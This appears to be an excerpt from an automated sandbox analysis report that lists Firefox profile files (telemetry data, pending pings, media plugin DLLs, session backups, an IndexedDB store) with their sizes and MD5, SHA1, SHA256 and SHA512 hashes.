SHA25678807b5189e6a6548359bcaf6dfe1a507e3f2c86076cdae28afd88be57d7d8ed
SHA51208ded28c192f4050e8813a1d79181eb3306b1cd47ae4f3ef95a9c5479ccf70fa906085031c1eff3eca95ef50fca72f655f8a7e1720d7a090e9ea04dfa9b375ef
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\3xhpu52e.default-release\datareporting\glean\db\data.safe.tmp
Filesize29KB
MD58d21849ac67b410a41c76dd81060a543
SHA1ef8036c3ca4026c9c0934ab054c5406e5133be30
SHA256261da7b77b1c469188dc86197a845db42bae7ef8734efaf40bbbadfddec7d57e
SHA512450d0fec763d77c51f0ea681349b2435e40113708c8e104326493bdd4844a0d09a4b9f477bc64747b8a285aa895e58b6e741ef998e09f511b950c82c89fa9e10
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\3xhpu52e.default-release\datareporting\glean\db\data.safe.tmp
Filesize6KB
MD5cb1c8c74dadc3d5a50f68a1719c079cd
SHA1bf78b840dcc2562a861d70d3417106363d28ec11
SHA256bbe7464459fbccdb637e33ba1728c08bf4da35f66154f818fc28d3571d95c62e
SHA512dda145c892fe07ffa05ebd9ac697069b505e2d1b1317f42b0de65f9df8d310b6263805e28be420cce6f4d675a5b40261f519152b60af28e5ef5e0f718a678297
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\3xhpu52e.default-release\datareporting\glean\events\events
Filesize1KB
MD51fd821f309e4710426e8927e0799c8ac
SHA1c7e8d5cdc0f23558f0399f7aece8737e4fcb92a3
SHA256963eba87aa7e8cdf905dca47b3701b877d81cbe55a80bf6b929230414b3485d0
SHA512f49790f3a2a46a522fb2e03b17ff6637d9be7ff9aa3a507fde387e928ee4697ca884ea17f2ee9208aafa8900cec360387a98720989b83b0d14dbc84cddc4b619
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\3xhpu52e.default-release\datareporting\glean\pending_pings\00da37da-5e82-475a-b0be-f5b7b3964fa1
Filesize235B
MD523fb5ea5bb458d8a572f1194066e5bb1
SHA19e02aa9c9017434fbaf9e76dc433d3234ab3f61a
SHA256e5718d6c7964ab071c6c080c5de9bdf6c2f373d157ad0233c721c3145933d144
SHA51257519680b728d0be3a38295fa285af761db4efdac4578c3c15913b5c28e77c878dcc97befb8371eabcbebf5640fd102d06c1aebfea31b4f6fd75eefb2e1c9a90
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\3xhpu52e.default-release\datareporting\glean\pending_pings\0acc01ed-feb8-4e47-b73a-0265e4b837d7
Filesize235B
MD5a7cb62658fdc1026ac1ce78d2ec27cea
SHA1ecb11265be268214130aefeb13557e54a21ce4f2
SHA256e97a4411bab8478316ab5897577a4aea00186f960552fa4f2c64fedd71cf035d
SHA5129265af565b64cd11443057e672afe132e1eaaeb8ae06f6e11fa425dfef26d2f7bdae161e0fec861f343d3ccca5ef4b2bd482ffa4b6c1d9db020518988bcdf80b
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\3xhpu52e.default-release\datareporting\glean\pending_pings\24b12621-81c2-47af-b802-d23969237ae6
Filesize2KB
MD51969010413d19cdd76ab69089d225ddf
SHA1d5a9cf7fde1fcaabe014d0db638791a31e29c263
SHA2561f3fa960277f0a93873e7caf98a332aa63564950aaba8b7c8d18aa5f2813dc23
SHA512b72fb00d5081b4f798f3a0e1123d9cbbdcf4e1dba221a73842651f205ee328148b583e2e3df4af74e970d2914b6bb991af226debc11d690196add4a52bfbcedd
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\3xhpu52e.default-release\datareporting\glean\pending_pings\85f6bd36-ed69-40f5-a13a-dd425c6c1315
Filesize16KB
MD5e787706eda2f99b6f53e1ca7cb15c566
SHA1ad65dfdfe3a26982179f6d8863c25aa0bb743ac9
SHA25673f7bddd89ed569504228bf26aed888d714da51d0eb85ca52cc759f103d6f215
SHA512b6ffd63dce3ffddc167c2c9fd01b234d8c10d5551771150ffbf0d61c2cb18f87ae63acf91ce34de5750d2bf734d37be8c4d9de3f154a39648702788f6f609055
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\3xhpu52e.default-release\datareporting\glean\pending_pings\af38c13f-e320-418e-a535-e21dff517314
Filesize883B
MD5946aa67e6f251880c55b34c091d0d478
SHA1a2a1b742b6b1d6ed59f9879c6ebb15e18eb9efcb
SHA256a9927a7e3aaa148644972b205936e8c17cf1548806aa30463bc11ddcd7c4dcc6
SHA512b01e4d5d5a51e7e07ccae99226a83f23fc472887c10c67fd98c62f464492a08eca0dfee57d8a92177b93b85fc8e05d7691d8f63b658e4f79270368f456da583e
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\3xhpu52e.default-release\datareporting\glean\pending_pings\e3262bd8-bd63-47a4-9696-b61ba9ce7146
Filesize886B
MD510e1eff6c9ac3581113954c3e8c6c076
SHA18b0a9d8f7b701723cf6cb50e9c768fbd314fd0ed
SHA256dacdc0931e884daffba40970917093f89e6bf781b23fd66217abbc92cdd86c83
SHA5126a681b76636cebefcd32d4b86919d941af8253528b4059d51f202314b1850ee0ed1572634b1a89f7a5d0f21402708dbdbf26dc037407b7d2397d35191e0589f5
-
Filesize
16KB
MD52c1d798be0feb22180887066b88f287f
SHA16717e805d0225445e02d923757fd5860d5b57f35
SHA256070643863461b8e108ac55397971087f254df8829d0b2af7ada158ce2d640c51
SHA512a4733f559ec203494c2851e3434fe166ee2a000c33ee15e333e646415e8742d8d5992c046b3613b6597a08bfed33ffc483f3f80d6275462abbf070a56758d293
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\3xhpu52e.default-release\gmp-gmpopenh264\2.6.0\gmpopenh264.dll
Filesize1.1MB
MD5626073e8dcf656ac4130e3283c51cbba
SHA17e3197e5792e34a67bfef9727ce1dd7dc151284c
SHA25637c005a7789747b412d6c0a6a4c30d15732da3d857b4f94b744be1a67231b651
SHA512eebdeef5e47aeadfeebdbab8625f4ec91e15c4c4e4db4be91ea41be4a3da1e1afeed305f6470e5d6b2a31c41cbfb5548b35a15fccd7896d3fde7cdf402d7a339
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\3xhpu52e.default-release\gmp-gmpopenh264\2.6.0\gmpopenh264.info
Filesize116B
MD5ae29912407dfadf0d683982d4fb57293
SHA10542053f5a6ce07dc206f69230109be4a5e25775
SHA256fe7686a6281f0ab519c32c788ce0da0d01640425018dcffcfcb81105757f6fe6
SHA5126f9083152c02f93a900cb69b1ce879e0c0d69453f1046280ca549a0301ae7925facdda6329f7ccb61726addee78ba2fffc5ba3491a185f139f3155716caf0a8d
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\3xhpu52e.default-release\gmp-widevinecdm\4.10.2891.0\manifest.json
Filesize1001B
MD532aeacedce82bafbcba8d1ade9e88d5a
SHA1a9b4858d2ae0b6595705634fd024f7e076426a24
SHA2564ed3c6389f6f7cd94db5cd0f870c34a296fc0de3b1e707fccf01645b455790ce
SHA51267dfe5632188714ec87f3c79dbe217a0ae4dfb784f3fac63affd20fef8b8ef1978c28b3bf7955f3daaf3004ac5316b1ffa964683b0676841bab4274c325c6e2b
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\3xhpu52e.default-release\gmp-widevinecdm\4.10.2891.0\widevinecdm.dll
Filesize18.5MB
MD51b32d1ec35a7ead1671efc0782b7edf0
SHA18e3274b9f2938ff2252ed74779dd6322c601a0c8
SHA2563ed0dec36754402707c2ae4fbfa887fe3089945f6f7c1a8a3e6c1e64ad1c2648
SHA512ab452caa2a529b5bf3874c291f1ffb2a30d9ea43dae5df6a6995dde4bc3506648c749317f0d8e94c31214e62f18f855d933b6d0b6b44634b01e058d3c5fcb499
-
Filesize
8KB
MD58342f605d01067f0029be111bbef98a0
SHA10d112abac564bdc82ca3f145743617d68462c655
SHA2569cca7a3f3eba5436c209fb84d528075890a1359810e5a504358fe783389d23e7
SHA512bfd526c58426acf1341461d915474d7e498e088cfeaa6353b00ba24238c650c3b4a95f38746b86fae3e61cd49c01f3b3179d9dd34dc6fe0a8029ca342677a7d5
-
Filesize
12KB
MD55e3adafdd99200abd242a688483ce8b3
SHA12eceadd7056d84d1a3753bcae46a26313331105d
SHA2569028dd6ac2413ff1ef98df2eaa80694b518df31cc0e2ce43af4c2b97489b531f
SHA512204d0ae6b1f19601ecdcc974d7e00719efd26edcdd3b951d3453cf1fafe71ed9f2ebd450229e340ca414ddc305b3bc34bec8544b44b04d6cbb1ef64c532d56fe
-
Filesize
6KB
MD5b66deab8158a9d4c03856180604b5cc3
SHA17912aa1467a4ed942fd4f6e0905be61ddf062520
SHA25644afbb9aab3b70f4a1f501859b3420fd395fd48152b3ee502e1ec954d7a510ab
SHA5127e1a682159336927fa8a1349c331a37a03ec665b19da7e4f63ccb162751bd638f670a3c1a2228a13f48e8c39e759e233c4e91d6fa0d3da6b6c6bb4b569b6ae94
-
Filesize
6KB
MD5c4525e5e3fd23f75815bdcb7159e5597
SHA1301bc08ea0d45f4b4046924748edc653049567fb
SHA2564bffeb3f2e2d24ca1f92194937954b6b81047e614b2e3f9ed58f9ba669309afd
SHA512756c19bdb1a53cea71d656ca9842e7924ccddb59d5d58b503f19c3de7396c79297f442041ea58ba9cb271c556c8c10bdc0a9b5e8314fb82fdc2fda413c2223d6
-
Filesize
6KB
MD504622a3864b9a31e0e0f3233c6d1038a
SHA163bdff59b71cc7f4e819dd09b47c15ceeed1b5d7
SHA2569414d7975dcfacfcca1eabd0d801815a4dd74c435b9ba8f6f2f107ef8bf6c610
SHA512a618a23374b0acded3f220e4b3926c2a1ad6fd67449f59af7e80a5af5314d40188fcc2f91f3534a5cb697a055a82cadab5053ed8764687521e38d95bca7584b9
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\3xhpu52e.default-release\sessionstore-backups\recovery.jsonlz4
Filesize1KB
MD526e5a32871f1baab3930f68c6f4a8249
SHA1f65b40beb0a8c456fb5179d12cc517261f7007a7
SHA256bfc178ca85ca8f74bc9624a22fae5317e9a93bb23972b1778cb4cfdaaa953c3d
SHA512467ebf3bf0333876c17e4c8f6d8a81266af8512bbf5cd421c0125059fb8ebd9abf6421c696a64f1a311dd500f338a061eb16ffdff9ab5ba532438dada626c669
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\3xhpu52e.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
Filesize2.3MB
MD5d4afacf93653c7cbb4cb616b4b0fb6ba
SHA11727d9c889226f326eb278926744c41d109f961b
SHA256e43e16f960745cae9d465a9218ce1d9589ce46283cca911647c218f439e9902b
SHA512521a721d38d73adbffd99e68c8ba4634745c10142d50dd2ba491c7232ef170667d9427442662d5bbba32b032c9dc69011b9302db5ed6b007d285ea00d2658c2f
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\3xhpu52e.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
Filesize10.4MB
MD5a4f4b29fc03d8d90e80721cdc70d1606
SHA1bae0e0383badf21eef8994e852f221dcf0531906
SHA256b4b81bdaba2cd9dd60ae047eb17454d8715ce4e8dfe5165d8e1300d177a43842
SHA5126db3bfa137f671a081b6ecc46f5c575cdb2b5b21fe8ba47314d6b26e0a9b18ce7f152536e6dc70209e3d03a43810686e58796dd27e886f3ef3109387d87c7d5e
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\3xhpu52e.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
Filesize10.4MB
MD5144108da30bc68b9ae1ea9c2c2e53622
SHA1b81d58083fcb50f2f063d1d20ec1b5a06047745d
SHA25658152018fd635869ef9cd131f42c595b18ccb31bd88627227878bdedafa3a4ff
SHA51252ac474bdb7d519b1f64d3e21416d7c5487c5a16c97d1bd111b8ef6023916020a1d6a5b01081b0fd3c768dc3b8acf2ba9d46f34a80fa6fa04b9843af72cfe1cb
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\3xhpu52e.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
Filesize10.4MB
MD5eb7242e9edd54a804ac01ad7a600cba7
SHA1d17fc45e3aa482a184252a0141aee5a929444573
SHA256500d9fd7a944a845ccedd90b73617bedc7d2a6e5bc668812d0b1971b3c7d4020
SHA512cff02424e9faf52d2fa26b8c5c8b316db1347b3730fff43ec2b9abb06e77fedf76f972b293cffafed15c952092ead6358bd23ce0977a18de65e4d96f0d026d75